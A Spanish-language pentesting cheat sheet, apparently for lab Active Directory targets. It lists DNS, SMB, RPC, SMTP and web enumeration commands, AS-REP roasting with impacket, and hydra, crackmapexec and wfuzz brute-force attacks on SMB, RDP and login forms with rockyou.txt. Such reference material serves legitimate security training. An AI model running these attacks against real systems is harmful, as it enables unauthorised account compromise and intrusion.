Enumeración
Enumerar DNS
dnsenum 10.10.11.21
dig dominio.local any @10.10.11.21
Agregar Dominios al archivo hosts
echo “10.10.10.20 mainframe.dominio.local” | sudo tee -a /etc/hosts
Enumerar usuarios válidos en el dominio con Kerbrute. Reemplazar /usr/share/wordlists/kerbrute/userlist.txt
con la ruta al archivo de lista de usuarios que tengas disponible.
kerbrute userenum -d dominio.local –dc 10.10.10.20 /usr/share/wordlists/kerbrute/userlist.txt
Explorar puerto smtp
smtp-user-enum -M VRFY -U /usr/share/wordlists/usernames.txt -t 10.10.10.20
Enumerar usuarios
enum4linux -a 10.10.10.20
Enumerar información con rpcclient
rpcclient -U “” 10.10.10.20
Dentro de rpclient comandos
enumdomusers
queryuser administrator
Enumerar con crackmapexec o netexec
crackmapexec smb 10.10.11.21
Exploración del servicio HTTP:
dirsearch -u http://10.10.10.20 -e * -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
gobuster dir -u http://10.10.10.20 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt,bak,zip,tar.gz
Ataque de fuerza para detectar usuarios con dont preauth
impacket-GetNPUsers dominio,local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.20
Ataque de fuerza bruta contra el servicio smb
crackmapexec smb 10.10.10.20 -u users.txt -p /usr/share/wordlists/rockyou.txt
Ataque de fuerza bruta con el servicio rdp
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.20
Ataque a panel de login
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt http-form-post “/login:username=^USER^&password=^PASS^:F=error”
wfuzz -c -z file,/usr/share/wordlists/rockyou.txt -d “username=admin&password=FUZZ” http://10.10.10.20/login
Revisar comentarios que podrían ser útiles a nivel de código de una web
curl -s http://10.10.11.21 | grep “<!–“